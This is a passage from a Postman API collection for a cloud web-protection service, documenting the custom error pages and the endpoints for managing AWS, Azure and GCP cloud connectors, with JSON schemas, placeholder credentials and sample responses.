Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:26:52 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"1fb9b362-869a-11e9-99a0-cb59002286b1"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"avmBeFX8oAMF5Qg="}],"cookie":[],"responseTime":null,"body":"{\"detail\": \"Predefined image is not allowed being deleted\"}"}],"_postman_id":"e4c2cac7-f6c0-4bc4-9938-048f88d8c166"}],"id":"97c732f7-452e-4e69-830e-1226586d54ab","description":"<p>You can customize the following pages that TIM Host Protection displays to your users:</p>\n<ul>\n<li>The error page TIM Host Protection uses to respond to a HTTP request that violates a policy and the configured action is Deny or Period Block.</li>\n<li>The \"Server Unavailable!\" page that TIM Host Protection returns to the client when none of the server pool members are available either because their status is Disable or Maintenance or they have failed the configured health check.</li>\n<li>The Captcha enforcement pages that TIM Host Protection uses to differentiate between real users and automated users, such as bots.</li>\n</ul>\n","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"06285dc5-a624-4687-8e98-44d0aff4f4da"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"1ba360c6-36da-4f86-9688-5e4b693653a3"}}],"_postman_id":"97c732f7-452e-4e69-830e-1226586d54ab"},{"name":"Cloud Connectors","item":[{"name":"Get Cloud Connectors","id":"f4f416bf-417b-4f4a-ade9-103c1afd45c3","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/global-cloud-connectors","description":"<p>Get the configuration information of Cloud Connectors.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","global-cloud-connectors"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"713c8d45-1ecb-4ee2-8f15-a2a12e45963e","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/servers","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","servers"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:34:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"9cc9e8b8-86a3-11e9-9c56-5df7ca7fdfd7"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avv-PF-5IAMF40A="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"},{"id":"f3a6ac9e-2ab7-41ae-b8c4-cc49498c2861","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/servers","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","servers"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:21:18 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"417"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"b8ae2dfa-86a1-11e9-9dc2-c195e9856560"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avt_VHGLoAMFrzg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf629fb-a24c19a6c1f619222a3e76b4;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"server_lb\": {\n        \t\"server_balance\": \"enable\",\n            \"lb_algorithm\": \"round-robin\",\n            \"persistence_policy\": {\n                \"persistence_type\": \"source-ip\",\n                \"sourceip_timeout\": 300\n            },\n            \"health\": {\n                \"health_check\": \"enable\",\n                \"url_path\": \"/\",\n                \"interval\": 10,\n                \"health_check_timeout\": 3,\n                \"retry_times\": 3,\n                \"method\": \"head\",\n                \"response_code\": 200\n            }\n        },\n        \"server_list\": [\n            {\n                \"set_server_status\": \"enable\",\n                \"server_status\": \"up\",\n                \"server_port\": 443,\n                \"http2\": \"disable\",\n                \"weight\": 1,\n                \"backup\": \"disable\",\n                \"ssl\": \"enable\",\n                \"server_type\": \"domain\",\n                \"server_address\": \"test.timweb-cloud-test.com\",\n                \"tls_1_0\": \"enable\",\n                \"tls_1_1\": \"enable\",\n                \"tls_1_2\": \"enable\",\n                \"tls_1_3\": \"enable\",\n                \"encryption_level\": \"high\"\n            }\n        ]\n    }\n}"}],"_postman_id":"f4f416bf-417b-4f4a-ade9-103c1afd45c3"},{"name":"Create Cloud Connector","id":"377a254b-0f60-4712-ab68-bf41528c55f1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n    \"name\": \"aws_connector_1\",\r\n    \"status\": \"enable\",\r\n    \"type\": \"aws\",\r\n    \"region\": \"ap-southeast-1\",\r\n    \"access_key_id\": \"XXXXXXXXXXXXXXXXXXXX\",\r\n    \"aws_secret_access_key\": \"*\",\r\n    \"have_vpc_id\": \"enable\",\r\n    \"vpc_id\": \"vpc-0a268fa6b745cfb3a\" \r\n}"},"url":"https://api.tim.waasonline.com/v1/global-cloud-connectors","description":"<p>Create a Cloud Connector.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"name\": {\n            \"description\": \"The unique name of the Cloud Connector, required.\",\n            \"type\": \"string\"\n        },\n        \"status\": {\n            \"description\": \"The status of the Cloud Connector, required.\",\n            \"type\": \"string\",\n            \"enum\": [\"disable\", \"enable\"]\n        },\n        \"type\": {\n            \"description\": \"The type of the Cloud Connector, required.\",\n            \"type\": \"string\",\n            \"enum\": [\"aws\", \"azure\", \"gcp\"]\n        },\n        \"region\": {\n            \"description\": \"The region of the AWS Account, required if 'type': 'aws'.\",\n            \"type\": \"string\"\n        },\n        \"access_key_id\": {\n            \"description\": \"The Access Key ID of the AWS Account, required if 'type': 'aws'.\",\n            \"type\": \"string\"\n        },\n        \"aws_secret_access_key\": {\n            \"description\": \"The Secret Access Key of the AWS Account, required if 'type': 'aws'.\",\n            \"type\": \"string\"\n        },\n        \"have_vpc_id\": {\n            \"description\": \"Whether to specify VPC ID, required if 'type': 'aws'.\",\n            \"type\": \"string\",\n            \"enum\": [\"disable\", \"enable\"]\n        },\n        \"vpc_id\": {\n            \"description\": \"The VPC ID of the AWS Account, required if 'type': 'aws' and 'have_vpc_id': 'enable'.\",\n            \"type\": \"string\"\n        },\n        \"server_region\": {\n            \"description\": \"The region of the Azure Account, required if 'type': 'azure'.\",\n            \"type\": \"string\",\n            \"enum\": [\"global\", \"china\", \"germany\", \"us_gov\"]\n        },\n        \"tenant_id\": {\n            \"description\": \"The Tenant ID of the Azure Account, required if 'type': 'azure'.\",\n            \"type\": \"string\"\n        },\n        \"client_id\": {\n            \"description\": \"The Client ID of the Azure Account, required if 'type': 'azure'.\",\n            \"type\": \"string\"\n        },\n        \"client_secret\": {\n            \"description\": \"The Client Secret of the Azure Account, required if 'type': 'azure'.\",\n            \"type\": \"string\"\n        },\n        \"have_resource_path\": {\n            \"description\": \"Whether to specify Subscription ID, required if 'type': 'azure'.\",\n            \"type\": \"string\",\n            \"enum\": [\"disable\", \"enable\"]\n        },\n        \"subscription_id\": {\n            \"description\": \"The Subscription ID of the Azure Account, required if 'type': 'azure' and 'have_resource_path': 'enable'.\",\n            \"type\": \"string\"\n        },\n        \"have_resource_group\": {\n            \"description\": \"Whether to specify Resource Group, required if 'type': 'azure' and 'have_resource_path': 'enable'.\",\n            \"type\": \"string\",\n            \"enum\": [\"disable\", \"enable\"]\n        },\n        \"resource_group\": {\n            \"description\": \"The Resource Group of the Azure Account, required if 'type': 'azure' and 'have_resource_path': 'enable' and 'have_resource_group': 'enable'.\",\n            \"type\": \"string\"\n        },\n        \"project_id\": {\n            \"description\": \"The Project ID of the GCP Account, required if 'type': 'gcp'.\",\n            \"type\": \"string\"\n        },\n        \"service_account_email\": {\n            \"description\": \"The Service Account E-Mail of the GCP Account, required if 'type': 'gcp'.\",\n            \"type\": \"string\"\n        },\n        \"private_key\": {\n            \"description\": \"The Private Key of the GCP Account, required if 'type': 'gcp'.\",\n            \"type\": \"string\"\n        },\n        \"zone\": {\n            \"description\": \"The Zone of the GCP Account, required if 'type': 'gcp'.\",\n            \"type\": \"string\"\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","global-cloud-connectors"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"70be7b31-f5e8-4fd4-8774-0771ad427e05","name":"GCP Success","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"gcp_connector_1\",\n    \"status\": \"enable\",\n    \"type\": \"gcp\",\n    \"project_id\": \"project-001\",\n    \"service_account_email\": \"test@project-001.iam.gserviceaccount.com\",\n    \"private_key\": \"*\",\n    \"zone\": \"us-west1-a\" \n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/global-cloud-connectors"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Create Fabric Connector successfully.\"\n}"},{"id":"afa0ef23-ff0a-45f5-b566-ccb3166b5fba","name":"Fail","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"aws_connector_1\",\n    \"status\": \"enable\",\n    \"type\": \"aws\",\n    \"region\": \"ap-southeast-1\",\n    \"access_key_id\": \"XXXXXXXXXXXXXXXXXXXX\",\n    \"aws_secret_access_key\": \"*\",\n    \"have_vpc_id\": \"enable\",\n    \"vpc_id\": \"vpc-0a268fa6b745cfb3a\" \n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/global-cloud-connectors"},"code":401,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"},{"id":"bab3fccc-5e0d-4431-a2e1-0c39e4ab3244","name":"Azure Success","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"azure_connector_1\",\n    \"status\": \"enable\",\n    \"type\": \"azure\",\n    \"server_region\": \"global\",\n    \"tenant_id\": \"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\",\n    \"client_id\": \"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\",\n    \"client_secret\": \"*\",\n    \"have_resource_path\": \"enable\",\n    \"subscription_id\": \"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\",\n    \"have_resource_group\": \"enable\",\n    \"resource_group\": \"cldwafCluster_koreacentral_4\" \n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/global-cloud-connectors"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Create Fabric Connector successfully.\"\n}"},{"id":"eb76f1b2-edbc-4358-917e-5fdc63f93932","name":"AWS Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"aws_connector_1\",\n    \"status\": \"enable\",\n    \"type\": \"aws\",\n    \"region\": \"ap-southeast-1\",\n    \"access_key_id\": \"XXXXXXXXXXXXXXXXXXXX\",\n    \"aws_secret_access_key\": \"*\",\n    \"have_vpc_id\": \"enable\",\n    \"vpc_id\": \"vpc-0a268fa6b745cfb3a\" \n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/global-cloud-connectors"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 09:20:12 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"44"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"f440c12f-86a9-11e9-a4ee-bd0372d17d3e"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"av2n0HfsoAMFxOA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf637cb-13a2a7b01c3710724fc56bca;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Create Cloud Connector successfully.\"\n}"}],"_postman_id":"377a254b-0f60-4712-ab68-bf41528c55f1"},{"name":"Update Cloud Connector","id":"15d32014-b436-47aa-b67b-da2b8a104c18","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"aws_connector_1\",\n    \"status\": \"enable\",\n    \"type\": \"aws\",\n    \"region\": \"ap-southeast-1\",\n    \"access_key_id\": \"XXXXXXXXXXXXXXXXXXXX\",\n    \"aws_secret_access_key\": \"*\",\n    \"have_vpc_id\": \"enable\",\n    \"vpc_id\": \"vpc-0a268fa6b745cfb3a\" \n}"},"url":"https://api.tim.waasonline.com/v1/global-cloud-connectors","description":"<p>Modify the Cloud Connector's configuration.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"name\": {\n            \"description\": \"The unique name of the Cloud Connector, required.\",\n            \"type\": \"string\"\n        },\n        \"status\": {\n            \"description\": \"The status of the Cloud Connector, required.\",\n            \"type\": \"string\",\n            \"enum\": [\"disable\", \"enable\"]\n        },\n        \"type\": {\n            \"description\": \"The type of the Cloud Connector, required.\",\n            \"type\": \"string\",\n            \"enum\": [\"aws\", \"azure\", \"gcp\"]\n        },\n        \"region\": {\n            \"description\": \"The region of the AWS Account, required if 'type': 'aws'.\",\n            \"type\": \"string\"\n        },\n        \"access_key_id\": {\n            \"description\": \"The Access Key ID of the AWS Account, required if 'type': 'aws'.\",\n            \"type\": \"string\"\n        },\n        \"aws_secret_access_key\": {\n            \"description\": \"The Secret Access Key of the AWS Account, required if 'type': 'aws'.\",\n            \"type\": \"string\"\n        },\n        \"have_vpc_id\": {\n            \"description\": \"Whether to specify VPC ID, required if 'type': 'aws'.\",\n            \"type\": \"string\",\n            \"enum\": [\"disable\", \"enable\"]\n        },\n        \"vpc_id\": {\n            \"description\": \"The VPC ID of the AWS Account, required if 'type': 'aws' and 'have_vpc_id': 'enable'.\",\n            \"type\": \"string\"\n        },\n        \"server_region\": {\n            \"description\": \"The region of the Azure Account, required if 'type': 'azure'.\",\n            \"type\": \"string\",\n            \"enum\": [\"global\", \"china\", \"germany\", \"us_gov\"]\n        },\n        \"tenant_id\": {\n            \"description\": \"The Tenant ID of the Azure Account, required if 'type': 'azure'.\",\n            \"type\": \"string\"\n        },\n        \"client_id\": {\n            \"description\": \"The Client ID of the Azure Account, required if 'type': 'azure'.\",\n            \"type\": \"string\"\n        },\n        \"client_secret\": {\n            \"description\": \"The Client Secret of the Azure Account, required if 'type': 'azure'.\",\n            \"type\": \"string\"\n        },\n        \"have_resource_path\": {\n            \"description\": \"Whether to specify Subscription ID, required if 'type': 'azure'.\",\n            \"type\": \"string\",\n            \"enum\": [\"disable\", \"enable\"]\n        },\n        \"subscription_id\": {\n            \"description\": \"The Subscription ID of the Azure Account, required if 'type': 'azure' and 'have_resource_path': 'enable'.\",\n            \"type\": \"string\"\n        },\n        \"have_resource_group\": {\n            \"description\": \"Whether to specify Resource Group, required if 'type': 'azure' and 'have_resource_path': 'enable'.\",\n            \"type\": \"string\",\n            \"enum\": [\"disable\", \"enable\"]\n        },\n        \"resource_group\": {\n            \"description\": \"The Resource Group of the Azure Account, required if 'type': 'azure' and 'have_resource_path': 'enable' and 'have_resource_group': 'enable'.\",\n            \"type\": \"string\"\n        },\n        \"project_id\": {\n            \"description\": \"The Project ID of the GCP Account, required if 'type': 'gcp'.\",\n            \"type\": \"string\"\n        },\n        \"service_account_email\": {\n            \"description\": \"The Service Account E-Mail of the GCP Account, required if 'type': 'gcp'.\",\n            \"type\": \"string\"\n        },\n        \"private_key\": {\n            \"description\": \"The Private Key of the GCP Account, required if 'type': 'gcp'.\",\n            \"type\": \"string\"\n        },\n        \"zone\": {\n            \"description\": \"The Zone of the GCP Account, required if 'type': 'gcp'.\",\n            \"type\": \"string\"\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","global-cloud-connectors"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"0969e078-649a-4db9-8a92-c8b925f740c9","name":"Azure Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"azure_connector_1\",\n    \"status\": \"enable\",\n    \"type\": \"azure\",\n    \"server_region\": \"global\",\n    \"tenant_id\": \"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\",\n    \"client_id\": \"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\",\n    \"client_secret\": \"*\",\n    \"have_resource_path\": \"enable\",\n    \"subscription_id\": \"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\",\n    \"have_resource_group\": \"enable\",\n    \"resource_group\": \"cldwafCluster_koreacentral_4\" \n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/global-cloud-connectors"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Update Cloud Connector successfully.\"\n}"},{"id":"403efc7e-3297-4866-86af-c5530652dbf4","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"aws_connector_1\",\n    \"status\": \"enable\",\n    \"reference_count\": 1,\n    \"type\": \"aws\",\n    \"region\": \"ap-southeast-1\",\n    \"access_key_id\": \"XXXXXXXXXXXXXXXXXXXX\",\n    \"aws_secret_access_key\": \"*\",\n    \"have_vpc_id\": \"enable\",\n    \"vpc_id\": \"vpc-0a268fa6b745cfb3a\" \n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/global-cloud-connectors"},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"},{"id":"7cc797a7-8564-4f20-a9d6-fa62f409bd8e","name":"GCP Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"gcp_connector_1\",\n    \"status\": \"enable\",\n    \"type\": \"gcp\",\n    \"project_id\": \"project-001\",\n    \"service_account_email\": \"test@project-001.iam.gserviceaccount.com\",\n    \"private_key\": \"*\",\n    \"zone\": \"us-west1-a\" \n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/global-cloud-connectors"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Update Cloud Connector successfully.\"\n}"},{"id":"82dc4f68-4b3b-4e1b-9fa6-b90d43d8032a","name":"AWS Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"aws_connector_1\",\n    \"status\": \"enable\",\n    \"type\": \"aws\",\n    \"region\": \"ap-southeast-1\",\n    \"access_key_id\": \"XXXXXXXXXXXXXXXXXXXX\",\n    \"aws_secret_access_key\": \"*\",\n    \"have_vpc_id\": \"enable\",\n    \"vpc_id\": \"vpc-0a268fa6b745cfb3a\" \n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/global-cloud-connectors"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 09:20:12 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"44"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"f440c12f-86a9-11e9-a4ee-bd0372d17d3e"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"av2n0HfsoAMFxOA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf637cb-13a2a7b01c3710724fc56bca;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\r\n    \"detail\": \"Update Cloud Connector successfully.\"\r\n}"}],"_postman_id":"15d32014-b436-47aa-b67b-da2b8a104c18"},{"name":"Delete Cloud Connector","id":"6dd4d156-c176-4b23-899c-6caac20e0b68","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":""},"url":"https://api.tim.waasonline.com/v1/global-cloud-connectors?name={{connector_name}}","description":"<p>Delete a Cloud Connector.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","global-cloud-connectors"],"host":["api","tim","waasonline","com"],"query":[{"key":"name","value":"{{connector_name}}"}],"variable":[]}},"response":[{"id":"5dae2942-ad99-4825-9087-a48cebc294db","name":"Success","originalRequest":{"method":"DELETE","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":""},"url":{"raw":"https://api.tim.waasonline.com/v1/global-cloud-connectors?name={{connector_name}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","global-cloud-connectors"],"query":[{"key":"name","value":"{{connector_name}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:26:17 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"46"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"08c9346d-869a-11e9-bcbc-a75865823244"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avl7eEtqIAMFyiw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf61d16-d93528509ed795107cb428c0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Delete Cloud Connector successfully.\"\n}"},{"id":"c6444e33-e8b2-4fb3-a070-271532277ff7","name":"Fail","originalRequest":{"method":"DELETE","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":""},"url":{"raw":"https://api.tim.waasonline.com/v1/global-cloud-connectors?name={{connector_name}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","global-cloud-connectors"],"query":[{"key":"name","value":"{{connector_name}}"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:26:52 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"1fb9b362-869a-11e9-99a0-cb59002286b1"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"avmBeFX8oAMF5Qg="}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"It is still being used by some origin server!\"\n}"}],"_postman_id":"6dd4d156-c176-4b23-899c-6caac20e0b68"},{"name":"Test Connector Connection","id":"1530e698-73e5-49ed-a9d3-2f6ceceda3cc","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n    \"type\": \"aws\",\r\n    \"region\": \"ap-southeast-1\",\r\n    \"access_key_id\": \"XXXXXXXXXXXXXXXXXXXX\",\r\n    \"is_encrypted\": \"false\",\r\n    \"aws_secret_access_key\": \"*\",\r\n    \"have_vpc_id\": \"enable\",\r\n    \"vpc_id\": \"vpc-04168fa6b745cfb3a\"\r\n}"},"url":"https://api.tim.waasonline.com/v1/global-cloud-connectors/test","description":"<p>Test the Connector whether its connection can be established.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"type\": {\n            \"description\": \"The type of the Cloud Connector, required.\",\n            \"type\": \"string\",\n            \"enum\": [\"aws\", \"azure\", \"gcp\"]\n        },\n        \"is_encrypted\": {\n            \"description\": \"Whether it('aws_secret_access_key', 'client_secret', 'private_key') is encrypted or plain text, required.\",\n            \"type\": \"string\",\n            \"enum\": [\"true\", \"false\"]\n        },\n        \"region\": {\n            \"description\": \"The region of the AWS Account, required on 'type': 'aws'.\",\n            \"type\": \"string\"\n        },\n        \"access_key_id\": {\n            \"description\": \"The Access Key ID of the AWS Account, required on 'type': 'aws'.\",\n            \"type\": \"string\"\n        },\n        \"aws_secret_access_key\": {\n            \"description\": \"The Secret Access Key of the AWS Account, required on 'type': 'aws'.\",\n            \"type\": \"string\"\n        },\n        \"have_vpc_id\": {\n            \"description\": \"Whether to specify VPC ID, required on 'type': 'aws'.\",\n            \"type\": \"string\",\n            \"enum\": [\"disable\", \"enable\"]\n        },\n        \"vpc_id\": {\n            \"description\": \"The VPC ID of the AWS Account, required on 'type': 'aws' and 'have_vpc_id': 'enable'.\",\n            \"type\": \"string\"\n        },\n        \"server_region\": {\n            \"description\": \"The region of the Azure Account, required on 'type': 'azure'.\",\n            \"type\": \"string\",\n            \"enum\": [\"global\", \"china\", \"germany\", \"us_gov\"]\n        },\n        \"tenant_id\": {\n            \"description\": \"The Tenant ID of the Azure Account, required on 'type': 'azure'.\",\n            \"type\": \"string\"\n        },\n        \"client_id\": {\n            \"description\": \"The Client ID of the Azure Account, required on 'type': 'azure'.\",\n            \"type\": \"string\"\n        },\n        \"client_secret\": {\n            \"description\": \"The Client Secret of the Azure Account, required on 'type': 'azure'.\",\n            \"type\": \"string\"\n        },\n        \"have_resource_path\": {\n            \"description\": \"Whether to specify Subscription ID, required on 'type': 'azure'.\",\n            \"type\": \"string\",\n            \"enum\": [\"disable\", \"enable\"]\n        },\n        \"subscription_id\": {\n            \"description\": \"The Subscription ID of the Azure Account, required on 'type': 'azure' and 'have_resource_path': 'enable'.\",\n            \"type\": \"string\"\n        },\n        \"have_resource_group\": {\n            \"description\": \"Whether to specify Resource Group, required on 'type': 'azure' and 'have_resource_path': 'enable'.\",\n            \"type\": \"string\",\n            \"enum\": [\"disable\", \"enable\"]\n        },\n        \"resource_group\": {\n            \"description\": \"The Resource Group of the Azure Account, required on 'type': 'azure' and 'have_resource_path': 'enable' and 'have_resource_group': 'enable'.\",\n            \"type\": \"string\"\n        },\n        \"project_id\": {\n            \"description\": \"The Project ID of the GCP Account, required on 'type': 'gcp'.\",\n            \"type\": \"string\"\n        },\n        \"service_account_email\": {\n            \"description\": \"The Service Account E-Mail of the GCP Account, required on 'type': 'gcp'.\",\n            \"type\": \"string\"\n        },\n        \"private_key\": {\n            \"description\": \"The Private Key of the GCP Account, required on 'type': 'gcp'.\",\n            \"type\": \"string\"\n        },\n        \"zone\": {\n            \"description\": \"The Zone of the GCP Account, required on 'type': 'gcp'.\",\n            \"type\": \"string\"\n        }\n    